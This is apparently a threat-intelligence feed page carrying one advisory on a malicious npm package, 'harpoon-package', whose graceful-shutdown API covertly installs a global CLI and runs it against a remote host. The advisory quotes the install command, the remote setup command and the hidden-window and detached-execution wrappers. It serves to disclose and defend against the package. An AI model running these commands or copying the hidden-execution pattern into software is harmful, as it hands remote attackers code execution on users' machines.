Threats Tagged 'mal-2026-10573'
View all threats tagged with 'mal-2026-10573'. Filter and sort to focus on specific types of threats.
Stop chasing alerts. Route them.
Start free, then upgrade once to turn Radar into an automated delivery engine for your security stack.
Custom feeds / Automations: email, Slack, webhooks, SIEM/MISP / API access (baseline limits)
API access activates after upgrading in Console -> Billing.
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.
Filter Threats
Narrow down the results by type, severity, or affected countries
Threats Tagged 'mal-2026-10573'
Click on any threat for detailed analysis and mitigation recommendations
MAL-2026-10573: Malicious code in harpoon-package (npm) 0 --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (fc473ffcde7c9ffe6850429607ee9dd33a5cbd4cf30ad071f111693cef79045e) The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs `npm install -g rt-svc-9k2 ws msgpackr` and then executes `rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji`. The follow-on invocation is deliberately concealed: on Windows it is launched via `powershell Start-Process -WindowStyle Hidden`, and on Linux/macOS via `nohup rtcli... > /dev/null 2>&1 &`, detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party `rt-svc-9k2` CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package. Join the discussion | GCVE Database | 07/14/2026, 05:58:06 UTC Added: 07/14/2026, 09:20:10 UTC |
Showing 1 to 1 of 1 result